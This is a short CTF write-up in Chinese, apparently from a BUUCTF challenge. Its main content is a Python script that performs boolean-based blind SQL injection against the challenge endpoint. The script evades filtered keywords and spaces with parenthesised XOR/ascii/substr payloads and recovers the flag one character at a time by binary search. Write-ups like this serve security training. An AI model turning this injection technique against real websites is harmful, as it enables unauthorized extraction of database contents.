fuzz 一下过滤参数，发现 union、updatexml 等被过滤了
测试后发现应该是盲注，不过空格也被过滤了，这里用 () 来绕过
编写脚本
import requests
import time
# Endpoint of the challenge instance (instance-specific host taken from the write-up).
url = 'http://9aec0978-fe58-4986-a25e-a860f7604140.node4.buuoj.cn:81/index.php'
flag = ''

# Recover the flag character by character (positions 1..42). Each character is
# located by a binary search over the ASCII range 0..127: the comparison
# ascii(substr(...)) > guess is folded into the `id` parameter and the page
# text reveals which branch the server took.
for pos in range(1, 43):
    hi = 127  # invariant: character code <= hi
    lo = 0    # invariant: character code > lo
    while hi - lo > 1:
        guess = (hi + lo) // 2
        payload = f'1^(ascii(substr((select(flag)from(flag)),{pos},1))>{guess})'
        resp = requests.post(url, data={'id': payload})
        time.sleep(0.1)  # small delay between requests
        # NOTE(review): the greeting presumably shows up when the comparison is
        # false (1^0 == 1), so its presence narrows the upper bound; otherwise
        # the lower bound moves up.
        if 'Hello, glzjin wants a girlfriend.' in str(resp.content):
            hi = guess
        else:
            lo = guess
    # lo < code <= hi with hi - lo == 1 pins the character to hi.
    flag += chr(hi)

print(flag)